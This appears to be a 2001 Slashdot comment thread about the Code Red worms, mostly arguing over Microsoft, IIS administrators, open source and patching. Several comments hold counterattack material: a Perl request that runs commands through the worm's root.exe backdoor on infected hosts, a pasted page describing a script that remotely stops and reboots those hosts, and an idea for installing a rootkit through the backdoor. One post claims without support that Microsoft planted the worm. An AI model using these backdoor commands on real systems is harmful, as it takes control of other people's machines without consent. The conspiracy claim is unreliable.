[SpaceLifeForm]

Prediction: before the year is out, you will see a "worm kernel" that incorporates thought-out techniques like this, with a modular interface for plugging in the latest exploits.

Wishful thinking? It's probably out already.

Re:Blame everyone bigger than you.!

Ya I can't wait to see all the excuses people make when the next BIND or Sendmail sploit comes out.

Microsoft doens't have a monopoly on crappy security.

How many times have i seen people scanning my whole subnet from a cracked redhat box?

way too many.

Re:You got it wrong. MCSE's are trained to...

[estes_grover]

if Reboot, Re-install, Add RAM fails....add CPU ;-)

Well...

[cyberwench]

... I have to admit that I would never have tried it (being more of a just-above-freezing-temperature Coke person myself) without the virus hype going on. Honestly, I wouldn't have known it existed if I wasn't keeping up with Slashdot.

Having tried it though, it's not bad. Sort of a carbonated fruit punch flavor.

At Last, the Professor Teaches the Easy Way

[lildogie]

Isn't it funny that they released a bonehead tool just after they found out that their own admins are boneheads?

Re:FUD ALERT

[crywolf]

Let's see. I install Win2K Pro. I start setting it up with some degree of security, install a few apps. It occurs to me to check for updates (it had to do with getting strong encryption in Win2K), so I download SP2. I install it, or try to. Partway through, it decides it can't find its files, no matter how many times I point to it. So I cancel, and then it can't find the files it needs to undo what it did. Again, telling it where the files are does no good.

Start over with installing Win2K Pro, but the SP is either the very next step or will not happen.

In retrospect, it could have been that I removed permissions from Outlook Express (obviously an essential part of the operating system).

I can certainly understand how anyone would be paranoid about installing something in Windows.

Re:Stop blaming microsoft

[DrSkwid]

If I lived somewhere where it rained bullets I'd make sure I installed bullet proof glass.

If the manufacturer told me it was bullet proof I'd probably believe him.

If it subsequently broke when a bullet hit it who's fault is it?

yours probably :)

Re:Wow, it really is [NOT] stopping

Here in San Diego, on Road Ruiner, [typo intented] CR II scans have gone from about one every five minutes to one every 15 minutes (with a lot fewer duplicates.)

But I attibute that effect to the default.ida script. :-)

Curiously, I've started getting CR ONE hits again tonight. NNNNNNNNNNNNNNNNNNNNNNN

Re:Since when?

Yes, it's part of the default install from the cd. From what I remember you have to say no or do not install or else the default it 'yes' install IIS. You're talking about an already build box like Dell or Gateway. He's talking about installing from an actual Win2k cd.

Re:Not the mess they made...

[malfunct]

And then someone will write an exploit of the "auto-update" feature to install whatever the hell they want on the machine. Yeah good idea bud :)

Re:Since when?

[omega9]

Lighten up. He only said "2k". Maybe he's running server.

Having said that, he probably is running Win2k Pro ans is a fucking moron.

Omega9
$chown us base

You know 'Ramen' is dutch for 'windows' :)

[Otis_INF]

I always found it funny the RH worm was called 'Ramen', which is the plural of 'Raam' or in English: 'Window'.

Re:Since when?

[omega9]

and

Re:Not the mess they made...

[malfunct]

Most users don't want to deal with that, they sign away thier safety and thats fine with them. I mean at some point not everyone in the world can be a computer expert, so are you recommending that people that aren't shouldn't have a computer? Fsking elitist. Sorry you lose.

There wouldn't be a computer industry if it weren't for the "stupid" people needing computers to help out thier jobs and lives. What we need to do is constructively help make the experience good and safe for everyone. MS is trying hard to do this, doesn't always succeed, but they try hard. Linux people just yell "rtfm".

Re:Actually: authors of strncat() MAN PAGE and get

FreeBSD even goes a step further; whenever you so much as RUN a program that links to gets(), it pops up a huge warning, basically saying "This program uses gets(), and is a root exploit waiting to happen!" Things like that really get bugfixes flowing to the authors. :-)

Re:Here's how open source would be better...

[cburley]

But you forgot one important detail: not everyone is a programmer.

Can you point to a single thing I said that shows that I "forgot" this one important detail??

The fact is, I'm acutely aware, and have been since about age 12, that I'm somewhat rare in being able to read source code.

My reason for posting what I did was not to convince you, it was to counter the propaganda you posted, so others may realize there are other views, may consider the various sources for those views, and do the research, or at least the thinking, for themselves.

To meet that goal, I need not back up everything I say, any more than you did in your claims about the security of proprietary software as a model, or in any of its specific forms.

I was pointing out that people with the virus are ignorant end-users.

If they're "ignorant end-users", why is Microsoft letting them run a web server on a hostile network, allowing their systems to become launching-pads for further hostile actions against other systems?

My point is that Microsoft exerts vastly more control over the computing environment of Microsoft users (and willfully so) than any combination of GNU/Linux/*BSD/CPAN authors do over the computing environment of their users.

(As one example: Microsoft's encyclopedia software -- "Encarta"? -- disables printing of illustrations on the user's screen, apparently to satisfy some intellectual-privilege concern. I discovered this when trying to help a friend who wondered why he and his children could print some pictures out on their inkjet printer, but not all. If MS can be so conscientious about deciding, on behalf of the user as they'd surely claim, that he shouldn't print something since he might turn around and get his $100 inkjet printer's output reproduced in a national magazine without paying the licensing fee, they can certainly disable IIS for users who haven't proven they can "handle" deploying such a product on a hostile network like the Internet.)

Therefore, Microsoft and other proprietary-software developers have taken upon themselves much more responsibility for their software being insecure, out of the box, than free-software developers, because they restrict the freedom of their users to actively engage in the sorts of open discussions and reviews regarding security that are day-to-day happenings in the free-software world.

Free software is about freedom, and that and related values are what are willingly and fully extended to all end users of that software. Microsoft (and, generally, proprietary) software is about profit, but more to the point, about control, about restricting freedom of the users of that software.

To pretend that the security implications of those two very different world-views are negligible or non-existant is to delude oneself.

(Note that I have made no claims about either approach being inherently "good" or "evil". My point here is focused simply on the fact that when you put the user in a straightjacket, you, the proprietary software developer, are responsible for the care, feeding, and shelter of that user, as well as for the violence committed by that user when you allow someone else to "infect" them with some virus and fail to restrain them, especially if you allow them access to a button they can press with their nose that is labeled "Destroy Internet". Those who refuse to put users in straightjackets, yet who are willing to provide them food they can freely use as they see fit, ditto for shelter, ditto for care, ditto for recommendations as to how to avoid accepting the intellectual, or software, equivalent of viruses, have nowhere near the same level of responsibility for their behavior. They do not have zero responsibility, however! But, in allowing their end users freedom, they give them much better defensive weaponry to use against those engaging in bad behavior, which is why those of us who run GNU/Linux, for example, aren't nearly as directly affected by badly-behaving proprietary software as are users of different proprietary software -- we haven't accepted unilateral disarmament as have they.)

I am arguing proprietary software does not equal insecure, and open source does not equal secure.

With that I almost wholeheartedly agree. Except, as I pointed out, proprietary software never equals "objectively provable as secure", since the general public can never be allowed to see the details of how it works and discover security flaws for itself.

If the software shop refuses to fix a security problem...

You went off the point there. It was you who made the claim that free-software fixes aren't always funded, whereas proprietary-software fixes are. (That is a reasonable inference from the symmetry of your earlier quote.)

So, I was not arguing against the free market, or capitalism, or libertarianism, or whatever other red herrings you wish to throw into this argument.

I was simply pointing out that being dependent on free software means depending on someone, somewhere in the world, being willing and able to fix problems for you when they come up (whether they are already an employee of yours), whereas being dependent on proprietary software means depending on such a person being found (and funded) in, what, about .00001% of the world's population. (This is my attempt at a quick calculation based on an assumption of 6000 people in a typical proprietary-software company vs. 6 billion people worldwide. Of course, the entire world's population isn't capable of fixing software bugs, but the percentage that is probably isn't vastly lower than the percentage of employees of a typical software company, in my experience.)

Further, unlike the corporate environment of a proprietary-software developer, in the "real world" there is no manager threatening someone for termination if they go ahead and fix a problem based on a customer complaint. (Believe me, I know both sides of this issue very well; I've been "reprimanded", or at least hassled in performance reviews, for taking time to provide very-well-received fixes for customers, as well as for in-house users. The free-software world does not revolve around such archaic constraints on human activity. Yes, I ultimately responded to such exercises of managerial oversight by leaving the organization -- at which point, I became incapable of rendering similarly fixes for those same customers in the future! I have no such limitations placed on me when I decide to leave a free-software project like, say, g77.)

Upon which pool of available talent do you (not the poster, but the /.-reading public out there) wish to restrict yourself, in finding solutions for your computing problems, such as inadequate security -- the entire world's population, or the approximately .00001% of that population whose only real "claim to fame" is that, if they help you, there aren't probably breaking the law as well as pulling rabbits out of their hats by hacking binary code with no source available?

Buy a new computer, perhaps? One that can run the newer software.

In other words, when the software you paid for the privilege of using, but not studying or improving, fails, you have to not only buy some next-generation form of that software, but newer computers to run it?

The answer is: of course that's true, for proprietary software. That's why, of the reasonably high number of 486 CPUs out there running in production mode as mail and web servers, a vanishing percentage, I suspect, run proprietary software for those apps -- instead, they probably run a Linux or *BSD kernel, Apache, qmail, etc.

That's also why my wife's organization's IT facility decided to finally convert over from Macintoshes to IBM PC machines to address the Y2K problem. Because Macs were not Y2K compliant? No, because Microsoft Excel, the version they were running on their Macs, wasn't, and to get a version that was that would run on Macs, they would have to upgrade the Macs themselves anyway, so they "might as well" switch to the more "dominant" architecture.

That is, they punished the company that produced a largely-Y2K-compliant system and rewarded the one that boxed them into a corner by creating Y2K-buggy software for years. That's exactly the kind of perverse result one would expect from depending on obscurity rather than openness.

Of course, if they'd had the source and the freedom to hire whoever they wished to fix it, they could have had the choice to fix just the Y2K problem in Excel and continue running it on their old, but perfectly-working, Macs.

Again, you are bashing Microsoft with "M$."

It's a common abbreviation I usually succeed at avoiding, but used, what, once in that entire post?

I claim your posts contained much more, and largely uninformed or gratuitous, genuine bashing of free software than mine did of Microsoft.

Disclaimer: my sister worked for Microsoft for many years. One of her positions included Lead Program Manager for Internet Explorer version 5. And I've been a longtime proprietary software (and technical-documentation) developer. I speak on these issues not so much to advocate one side or the other, but to rebut the misinformation that's widely circulated (by people such as yourself) regarding the respective software paradigms.

And what, the original poster gets away with implying Microsoft is representative of the security-conscious?

I don't know if he did that, but your response equated the single source of unexaminable, yet widely-deployed (on a hostile network, no less) software with one of the sources long known to be a poor choice, from a security perspective anyway, among many choices for software that does not come widely represented (and heavily marketed) as a "one-stop shop" for ordinary people to get on the Internet, run web servers without sysadmin experience, and yet be responsible net citizens, from security and other perspectives.

Anyway, if your point is that people who say "Gee, if these folks would run free software, there wouldn't be so many security problems" have some serious flaws in their arguments, I agree wholeheartedly. But I don't say they're wrong, per se, just that statements like that often are oversimplified to the point of being, at least nearly, useless.

(Fortunately, there isn't a $Billion advertising budget behind that message coming from free-software developers, so the importance of rebutting the arguments from that source seems, to me, to pale compared to that of rebutting the arguments coming from other, well-funded, sources.)

Your lesson for today: learn there are other proprietary software vendors than Microsoft. I was only using MS because this thread is about their product specifically. The original poster implied that OS was inherently more secure than proprietary, and I still refuse to accept his or your reasoning.

Your arrogance is really over the top. I, of course, have worked for many proprietary-software developers, none of them Microsoft, but can't help noticing which one has survived and flourished as what most people think of as the source of software enabling them to access the Internet.

And while I agree that free software isn't, at the level of instantiation (that is, instances of free software), inherently more secure than proprietary, I do claim that it's inherently more secure as a model for software development and deployment.

Further, my impression (definitely devoid of necessary research to support it) is that, in the free-software community, well-designed, secure software is a much better predictor of deployment, especially over the long term. Look at how "poorly" qmail is "marketed", yet its installed base is pretty amazing.

After all, let's review another statement you made here:

What I am defending is the numerous secure proprietary software out in the world.

Name one. Name one that you can show is secure, in a public forum, by reviewing the most important material that should come into evidence: the source code!

And that's the crux of the debate we're having. Ultimately, you believe that security through obscurity, in the form of not only obscuring algorithms, but obscuring the fact that proprietary-software developers have a form of relationship with their customer base that cannot, even under the best of circumstances, be described as "demonstrably committed to mutual security", is the best solution. (I use "committed" in the sense that "when it comes to ham and eggs for breakfast, the hen is involved, while the pig is committed". Proprietary-software developers do exist that provide some degree of commitment to the security of their customers' installations, but that commitment is, in my experience, "earned" via distinct payments and other consideration, compared to the software they sell. That is, the mere act of acquiring and deploying proprietary software rarely earns a customer any useful commitment from the vendor regarding security. The same goes for free software, in spades, of course, but with free software the customer has not only the original vendor to go to to purchase additional security commitments, but pretty much anyone else in the world, since he has access to the source code, to open forums for discussing its security, and to source-level patches to improve and/or test that security.)

I believe that security, especially in the context we're discussing (security of systems on an open worldwide network like the Internet) is best, perhaps only, achievable through openness, in the form of open review, discussion, and testing of the models used to enforce it and the software that is written to support it.

And with the model I choose, it doesn't matter nearly as much how "friendly" a software producer is with a given software consumer, since the latter can always review the source code himself (an option that, obviously, includes paying someone to do so).

Note that I'm not representing myself as an expert on security. If you want to get an opinion from one, ask him this question:

"All else being equal, would you rather choose, to secure an installation, a one-stop-shop-type monolithic solution from a single vendor, said solution's inner workings being kept secret from you and nearly everyone else, with your being legally and practically preventing from exploring its workings, perhaps even from seriously testing those workings? Or would you prefer to choose among a wide variety of openly developed, deployed, discussed, and tested components of an overall solution that you can either design yourself, hire someone to design, or some combination in between, where each component's inner workings is fully available to not only you, but others in your profession as well as the general public, and can, and have, been tested in open forums, with both successes and failures reported in said forums?"

I'm purposely comparing the two extremes on the continuum between free and proprietary software (and it is a continuum), but the answers from most security experts will, I believe, point to the end of that continuum that most directly coincides with free software, and rarely coincides with any particular proprietary-software solution.

Further, to the extent proprietary software tries to emulate particulars of free software in this continuum, to achieve more favorability, it becomes less proprietary. In particular, the financial advantages that accrue to the typical proprietary-software developer tend to diminish, in favor of advantages free-software developers already enjoy. At that point, as a customer, you're going to be paying the proprietary-software developer more to offset those losses (as calculated by the vendor) anyway, so you have even more funds to consider devoting to deploying free and open solutions instead.

After all, it isn't the free-software development community that pushes for things like the DMCA, is it?

The real solution.

[jcr]

www.eros-os.org.

When we can run the microsquish shit under emulation, on an OS that offers real security, then viruses, trojans, and worms become infeasible.

On EROS, there's no reason for an app to have a write capability to its own code space: ergo, no worms.

-jcr

Your sig is hilarious.

Hah!

HTML guru, but when I go to your home page, I get a completely blank screen. Very funny.

Re:Your sig is hilarious.

So do I. He's one of those fucktards that makes the whole page out of JavaShit.

Re:Not the mess they made...

[DrSkwid]

not really you see IIS runs as administrator and apache runs as nobody/www

getting a root shell through apache is much harder than through iis, though I'll accept it's not a guarantee

MS seem to code from the wrong side of the security fence from admin inwards instead of nobody outwards (if you see what I mean).

plus the fabled tight integration of OS/Web Server/Other Apps makes increases the possible vectors.

This was almost really a bug in Index Server not IIS.

Have all your product from one vendor in a machine set up that's is almost identical in every installation makes things easier.

I run FreeBSD because I get some free security through obscurity. Ideally I'd run somethign like plan9 on my production boxes because then I'd get even more obscurity. Sadly migrating the php dross over to plan9 was too much to tackle to get it to production so I'm stuck with FreeBSD.

If you choose MS products in your important environment then you really get what you deserve.

And I used to be a pro NT guy but 2 years of adminning it on the internet running client websites taught me to have bye bye to Redmond and hello world.

Re:Stop blaming microsoft

[Tony-A]

No, it's like you bought plexiglass and instead got that break-away stuff they use in the movies.

Re:MS Tool

[well_jung]

The worm's memory-resident, moron. You have to reboot to get rid of it. No shit, Coward. It was a joke. Maybe the smiley face should have tipped you off.

Re:Stop blaming microsoft

Please do..I'm getting tired of all the M$ apologists around here

ummmm

How come no one blames the assholes that wrote these worms to begin with?

It's more fun to blame MS?

The Real Fix

[leonbrooks]

The real fix is to disable the extention mappings for things like .ida/.idq and so on

The real fix is to install some other web server. If it supports PHP you can also migrate your VB ASP scripts using ASP2PHP. But maybe you don't want to drag extinct-but-doesn't-know-it-yet methodology and technology across to your shiny new server?

And... since you're changing such a major server component, why not change the whole server so that you're not, one day, forced to upgrade to Windows XP and bleed money for insecure software for the rest of your life? Install Service Pack MAXINT today!

Re:Not the mess they made...

[pointwood]

Talking about rebooting - check this news.com video out.

Everybody but Bill Gates thinks it's pretty funny :)

No.

[Tridus]

This says nothing about the character of IIS Admins, its about admins in general. And more importantly, people running this thing who don't even know that they have it running.

Here is what they should have done to get this thing patched quickly.

"Everybody running a version of Windows on their computer should go to http://windowsupdate.microsoft.com , and download all of the items in 'Critical Updates' (which has the security patches selected by default when you first load it anyway)."

If you are vulnerable to Code Red and your a home user, the patch appears in the list of updates and will be installed. If not, well no harm done.

Thats the whole point of Windows Update, if we could just get people to go to it even if they don't think they are open to Code Red, we could put a stop to this thing really fast.

Thats the problem here, not IIS. A bunch of clueless home users who don't know whats going on and have no reason to check because of the way its being reported will not be the downfall of IIS. If Linux had any amount of home users to speak of, we'd see the same sort of problem among them eveuntally.

Re:No.

[mpe]

"Everybody running a version of Windows on their computer should go to http://windowsupdate.microsoft.com , and download all of the items in 'Critical Updates' (which has the security patches selected by default when you first load it anyway)."

Assuming Microsoft actually bother to put the right patchs here. IIRC they didn't with the relevent IIS patch.

Re:No.

[rambot]

are you going to criticize stupid shit, or are you going to talk about the issue at hand ya fuckin flame bait bitch.

Re:No.

AND! yes it does say something about the character of the IIS admins, because it takes very little technical know how to get a IIS server running. ("I had IIS running? I had no idea") Like I said! Uninformed, ignorant, or lazy! PICK ONE!

Your posts do say something about your character too, for it doesnt take much knowledge to stuff four or five &ltP&gt tags in a sig or in the post itself!

Pick one...

While Im at this, you should have said "decline in their numbers".

Re:No.

[rambot]

Dumbass! No I wouldn't because it wouldn't be running as root!

Use the tool, then format anyways?

[moniker_21]

So first Microsoft says this in the description of the tool:
Microsoft has developed a tool that eliminates the obvious damage that is caused by the Code Red II worm.
Then they say this:
MICROSOFT RECOMMENDS THAT INFECTED INTERNET-FACING SERVERS BE REBUILT ACCORDING TO THE GUIDELINES PUBLISHED ON THE CERT WEB SITE.

It should be noted that among other things in the CERT guidelines, they tell you to do a clean install of your OS after you've been comprimised. So what's the point of this tool if MS thinks you should just R&R your OS anyways?

Re:Use the tool, then format anyways?

[stripes]

So while not completely bullet-proof, the possibility is certainly there that one machine visible to the Internet got infected and spread the infection to other machines on the network which are not visible to the Internet.

So that second machine is totally safe, as long as there is no security problem on the first machine that lets anyone in to it (root.exe anyone?)... in other words better reformat 'em both.

The "hidden" machines may have a lower chance of having be altered, but since they are probably more important (otherwise why hide them?) that should make one want to be even more careful with them.

Re:Use the tool, then format anyways?

[ZxCv]

You left out the part that said machines which are not visible to the Internet should just run this program and reboot. And machines which are visible to the Internet should do a complete rebuild.

Many machines that are invisible to the Internet by way of a firewall are visible to other machines on the same network that are visible to the Internet.

So while not completely bullet-proof, the possibility is certainly there that one machine visible to the Internet got infected and spread the infection to other machines on the network which are not visible to the Internet.

Stupid guidelines if you ask me, but certainly not ambiguous to me.

Re:Blame everyone bigger than you.!

You claim, "it's not microsoft's fault if their userbase are composed of clueless morons...".

But Microsoft has marketed their products at the clueless moron, right from the beginning. How then, can the userbase contain anything but a majority of morons? Microsoft products have always been thought of by typical users as "mass market" products. The fact that NT and Win 2K are aimed at business users is lost on most. It has never been emphasized by Microsoft that these products are too difficult for morons!

It also goes without saying that any product marketed primarily to morons must be foolproof and robust to the most extreme extent possible. Does IIS qualify here? All the difficult bits should have warning messages at install time, similar to the warnings on cigarette packages, or the warnings on drug packages against dangerous interactions, knowing full well that products may be used by a moron.

Are IIS or Win 2K products that, in their present state, should be marketed to morons? Will XP be even worse?

Re:Stop blaming microsoft

[DrSkwid]

hmm

manufacturer releases 4 sprays that have top be applied in the correct order and windows will only be bulletproof if no particular other sprays reached the window during the normal course of regular window spraying

user then leaves the patio doors open anyway

Perl script to send message...

[Kutsal]

You can modify the Sam Philips' script so that it sends a message to the infected machine:

my $iis_stop_req = new HTTP::Request (GET => "http://$ENV(REMOTE_ADDR}/scripts/root.exe?/c+net+ send+*+\"You are INFECTED with the CODE RED WORM! Please FIX your IIS!\"");

If you are running a TFTP server, Windows 2000 has a tftp client that you can use to download the CodeRedCleanup.exe and run it on the infected machine.

With an exploit like this, the possibilities are endless......

Worse...

[Julian+Morrison]

A use that immediately strikes me: use RCII to install a rootkit, use the rootkit plus MS's deinstaller to hide the tracks of the initial RCII infection. Oops.

Conspiracy Theory

[hacker]

Has anyone begun to think that perhaps Microsoft themselves has planted CodeRed and variants out on the internet? Before you mod me down, read on:

CodeRed, the first version was fairly lame, and didn't infect beyond a separate IP block. Microsoft gets scared and realizes that their "iminent" release of WinXP might be blocked, or worse yet, shunned by the consumers. "Oh no, now we can't track all those stolen copies of Windows".

Then CodeRedII comes out, a bit nastier, going after more machines. Then Microsoft is denied their appeal.

CodeRedIII comes out, infection is much worse, and now opens the machine up to more attacks than before. It gets so deep into your Windows system that you must reinstall anyway. Not only that, but allows anyone who reads their logs to go in and cause damage ("polluting blame" as we say). Now compromised machines are being hacked in many more ways than just being opened up.

What does Microsoft recommend? You download this "patch" (audit tool) which you run and then it "cleans" (audits) your system, then as their own CERT document recommends, you reinstall your OS (i.e. find your original, licensed install media, and hit our website for the latest (intentionally trojaned) copies of drivers and IE/ActiveSetup installation tools).

What's a bit odd about this process though, is that Microsoft requires that you run their "cleanup" tool to purge the infection, THEN reinstall. If I'm going to fdisk and reinstall anyway, why do I have to run this "cleanup" tool? (audit?)

Curious that nobody has thought of this angle. Why do we not hear about hundreds of FBI agents tracking down the author of the virus in the Faroese Islands or whatever. Usually these people are caught within days of the outbreak. There hasn't been a single peep about any investigation in two full weeks. It's not like we don't have a HUGE audit trail, we all have dozens of logs. Plot it out, find the dates/times, narrow the search,and find them.

Oh wait, perhaps they're the same entity which supplied you with the infectable OS in the first place.

What was that they were saying about Linux being "potentially viral" a few weeks ago?

Re:Here's how open source would be better...

[cburley]

What exactly does your (and other poster's) argument, or need, for a different vendor of the same product have to do with security?

Excellent question. My best shot at an answer right now is that security (in the context of our discussion) is best achieved through a combination of factors, including robustness, clean, simple, unfettered design, solid engineering, and so on.

Components that demonstrate the ability to be interchanged with and for other components, especially those from other vendors, especially in the presence of specifications and standards agreed upon by the industry as a whole, tend to better demonstrate those very qualities.

I can also guarantee you a Linux system with FAT32 support. That does not make Linux a Windows machine, now does it?

No, of course not. What it does illustrate is that FAT32 is not so inscrutable and poorly designed that alternative vendors can't support it, and that whatever security failings it might have (and I don't know much about that offhand) are more likely to be well known and well documented by the very fact that someone else, in this case multiple other "vendors", have employed it as an interoperable component.

Where can you get the Linux kernel in FreeBSD? BeOS? NT? The kernel is not an interchangable part like an engine can be.

Sorry, you're very wrong about that. There's a reason some of us call the system "GNU/Linux" (other than the fact that some wish to associate with the popular name "Linux" the GNU name) -- because there is every possibility of creating an operating system based on the Linux kernel, but using utilities that are sufficiently compatible with, but not themselves, of GNU origin.

Ditto for GNU/Hurd, a GNU system with Hurd as its kernel. A kernel that could be used as a component in a completely different system.

Here's where you see the kinds of qualities expressed by a component that guide you towards an increased assurance regarding its security: since the Linux kernel is deployed on a huge number of devices in a form not consistent with the usual definition of "operating system" (say, in embedded devices), and since GNU utilities are widely deployed, or used to deploy, other systems that are neither GNU nor Linux, you have more assurances that both GNU and Linux are devoid of fundamentally unsound, undocumented security failings in design, and are less likely to have undiscovered bugs in their implementations, compared to proprietary-software components that don't interoperate as well.

Nor is the kernel always an open design.

What's your point? Linux, many *BSDs, Minix (?), and the Hurd are all examples of open-designed, maybe even free-software, kernels. And they enjoy a great deal of interoperability with each other, compared to almost any two proprietary kernels you can name (even two Microsoft ones, I'd guess, but certainly, say, WinNT's versus MacOS6's).

But even non-open kernels, like Solaris (I assume) and HP-UX (I'm even more sure), gain some assurances by interoperating as well as they do with the GNU utilities, and vice versa. Ditto, but not as much, for Windows and GNU, since (I gather) the Windows ports for GNU utilities are, for such a successful system, rather hard to do and still (?) somewhat incomplete.

The implications of the Windows/GNU combination include that if there are security mechanisms that are incorrectly placed in Windows, i.e. placed in a portion of userland that is replaced by a GNU utilitiy when it should have been a kernel mechanism, that will be more quickly exposed and easily demonstrated via a combination Windows/GNU system. It might even be discovered by the authors of the Windows port for the replacement GNU utility -- a great example of a "white hat", one can reasonably assume, making an important discovery, one which Microsoft would, like as not, be unwilling to expose, even though "it" would certainly know about the failing.

Further, while I've focused on the objective factors, or qualities, of deployed components, I suspect the real payoffs come during the period in which real people construct systems that use your components in ways you didn't plan, even when they toss out your component in place of another.

At times like that, they're more apt to notice, and more willing to question, document, publish, things that might be failings in your design or implementation -- perhaps based on assumptions you made regarding the components with which your component would "always" be deployed.

Further, the very act of focusing on designing and deploying an interchangeable component (much more like the Linux kernel, or the Apache web server, or qmail as well as its subcomponents) as versus a component that's intended only for use with a much larger monolith (much more like the Windos kernels, the IIS web server, or MS Exchange) causes the developers to think carefully about the exact sorts of interface and "border" issues that greatly affect real-world security. (Think about all those web-site security bugs that stemmed from the developers really believing the user's browser was actually a component in their web-site's monolithic "experience". The result? They'd shovel info to the browser for the user to interact with, then foolishly trust the (modified) information that came back, as if the user couldn't change it however they liked, even beyond what the web site's JavaScript (or whatever) was designed to allow.)

After all, the small-component developer must think first about things like "how do other components like mine work? how is it made secure? what are the pitfalls?", while the monolith-component developer tends to think about things like "the monolith will provide security; the monolith will make everything work; we needn't look at pitfalls of other systems, since this is a new, wonderful system unique from all the rest".

Which mind-set do you honestly think more describes that of the typical developer of widely deployed GNU/Linux software, and that of the typical developer of widely deployed Microsoft software?

Having plenty of experience in and with both worlds, I know the answer in specific cases aren't always clear-cut, but, overall, it's the monolith-creating culture that is more willing to ignore history and reinvent the wheel. (There are those in the component-creating culture that do that, too, but they rarely succeed in making their component important in deployed software, because they can't force it to happen so easily.)

DSL Crashing

If you have a Cisco 675 that is crashing, see

http://www.incidents.org/archives/intrusions/msg 01 132.html

Just doing set web disabled, is not enough!
You must also do the additional steps listed in the above url.
This solved all my cisco 675 router crashing problems!

Re:FUD ALERT - and m$ bashers posting on /. !!?

[dank113]

If you paid Microsoft bashers are going to post FUD like this please make it a little less obvious. nobody needs paid to bash m$. they bash themselves plenty good. any organization that believes bashing m$ is in their best interest knows this.

Re:Start blaming Microsoft again

[reflective+recursion]

Alrighty then! Lets blame Microsoft for the ignorant users of IIS. While we are at it why not blame Ford for the idiots who drive drunk? Sounds like an idear to me..

A better analogy:

[Giant+Hairy+Spider]

Blaming MS is like blaming the Death Star designer for the death of hundreds of thousands of loyal soldiers and the loss of untold billions of credits, when it was really the rebels who blew it up, regardless of any design flaws.

The internet is a hostile network, anything that connects to it should be secure. There's plenty of blame to go around.

Re:Bad MS Downloads

Run the patch at the command line with -L to make sure it is installed. the -L switch will list what hotfixes are installed.

Re:CI Host sucks rocks

[Dr.+Bombay]

You might be interested in taking a look at what StellarHost has to offer
http://www.stellarhost.com
We have a rock solid network and great customer support.

Re:Liability for software defects

[nettdata]

There's been talk on places like CNN and CNet about software makers being held liable for serious defects in much the same way Ford and Firestone are for their recent tire troubles.

I think that would cause a bigger problem than it would solve. As soon as you start making the software developers liable for the problems with the software, then they will start restricting the use of that software in order to cover their asses.

"What? You used that software for business purposes, on a machine with an Internet connection? Sorry, that breaks our terms of use... you're on your own."

Also, I think comparing it to something like vehicle manufacturing is a little extreme. Let's face it, for the most part, I would venture that it is far easier to test a vehicle for defects than it is to test a piece of complex software. There are just way too many possible system configurations/setups/situations that could potentially cause problems in order to test them all. And when was the last time you had a fatal head-on collision because Code Red "blew up" your server?

I think that the blame should be set square on the shoulders of the corpoorate decision makers and implementors who (a) choose to buy and use shitty software and (b) the implementors and administrators who don't know what the hell they are doing. Let's not even start talking about (for the most part, the lack of) proper Risk Management analysis in most corporations that use this software.

Now, people are going to complain about the non-commercial, Individual users. Well, let them get hacked. Somebody somewhere will end up deleting everything off of their machine or reading their back statements. If anything, that'll teach them a valuable lesson. "But they're flooding the Internet!" So what? They bought bandwidth from their provider, and they're using it (albeit not knowingly!). When their usage hits their limits, then it should be up to the ISP to make them pay more money, or take some action. "But they're attacking my site!" Are you yourself getting infected with the worm? Silly you. I've been getting around 5,000 - 10,000 hits a day to my server because of Code Red. Big deal. All they really represent are lines in my Apache log files.

Re:Wow, it really is stopping

as of today 8-17-01 I am getting dinged in the double digets per hour still by CR infected systems.

Has anyone tried running this under Windows?

[Mustang+Matt]

I haven't examined the script yet but Perl will run under windows. Not sure how you'd give it control of .ida though.

Re:Has anyone tried running this under Windows?

[BigBlockMopar]

A little off topic, how do you know if the infected computer is version 1 or 2?

Follow the link in my .sig. NNNN = Code Red I. XXXX = Code Red II. Most of them now seem to be CR2 because it's a much more active hunter. When my log files rotate, you're gonna be out of luck until I get hit again. :)

Re:Stop blaming microsoft

[KilobyteKnight]

When you buy a house, you know for a FACT that glass will break when hit with a hammer.

The people who buy MS products THINK they're getting something secure, since it's one of the many buzzwords (READ: lies) that MS always uses.

Many people look to buy house in a "safe" neighborhood. Most people want cars with a good "safty rating". People install alarm systems in their homes and cars to make them "safer".

You know what... none of that works either. Determined people will always find a way to break things. It doesn't matter if it is a house, a car, an alarm system, or an operating system.

You simply shouldn't try to blame one entity for the malicious acts of another.

get the patch

[bartyboy]

seems to work fine for me. perhaps you should install the patch. Or maybe you were just joking and everything's fine: ---START PASTE---

WELCOME NTK READERS!

If you are reading this page, then you are probably curious...

This page is actually a script that will connect to your machine and try to shut it down. Since you are seeing this you probably aren't a Code Red infected box.

This will only work if you are infected with the "code red" virus which isn't really a virus but is a part of the Microsoft Internet Information Server (IIS).

If you were a Code Red infected IIS then the command just sent to port 80 was to stop iis and to reboot your machine. If you aren't infected, then you have nothing to worry about, otherwise.. you should really use a secure webserver don't you think?.. one that doesn't let people in a gaping back door to do stuff like this...)

This is how you can protect yourself and others, if you run perl, and a competent web server:

1. Download this script.
2. Rename it default.ida and place it in the DocumentRoot of your server
3. Make sure the .ida extension is handled as a perl CGI script.

If you can't figure out any of the above instructions then find someone who can.

For historical purposes here's the old SSI version.

---END PASTE---

FreeBSD security, HAH!

Too bad hacking root on a FreeBSD box is easier than freezing water on the North Pole!

Re:FUD ALERT

[Longstaff]

It seems to me that a GOOD ADMIN would have any important data backed up prior to installing/upgrading any mission critical servers. Just because you're a negligent moron doesn't mean that Windows sucks. You're correct that a "Good Admin" would back their data up before performing a system upgrade / patch.

However, in this case, Windows DOES suck, regardless of the (moron|genius) at the keyboard.

Any system that *requires* OS updates to be bundled and installed along with the application (IIS) updates is broken. It matters not if you have an intern "administering" the box or a 10-year-vet.

If, for some reason, the latest bugfix from Apache broke compatibility with a current or previous Linux kernel, I can always pop a new kernel in there. On my own time. Checking to make sure that none of my other apps will break. Even if I'm not paying attention and blindly upgrade Apache without checking its deps, I'm left with an unusable Apache - my data is still there. I can just backpeddle to my previous Apache and I'm up again.

Not so with (2K|NT)/IIS. Install SP, hose machine...reinstall...

One of these situations takes a little more time than the other...

The patch from MS should..

start a network load of of a *real* os after reboot to ensure the problem doesn't returen..

Re:Stop blaming microsoft

[TedCheshireAcad]

Seriously, we don't need standard library routines. What use is printf() anyhow??

Re:Stop blaming microsoft

this is the most well written, poignant comment I have read on this entire thread. You go girl!

Re:About time!

[SuiteSisterMary]

Are you stupid? The first rule of system hardening is 'turn off services you don't need.' Pretty much every network operating system (except, I believe, certain variants of *BSD) tends to run daemons which generally aren't necessary. And I'll note that Bastille Linux turns off unneeded daemons as part of it's hardening routine.

The real issue is marrying OS and services

[thejake316]

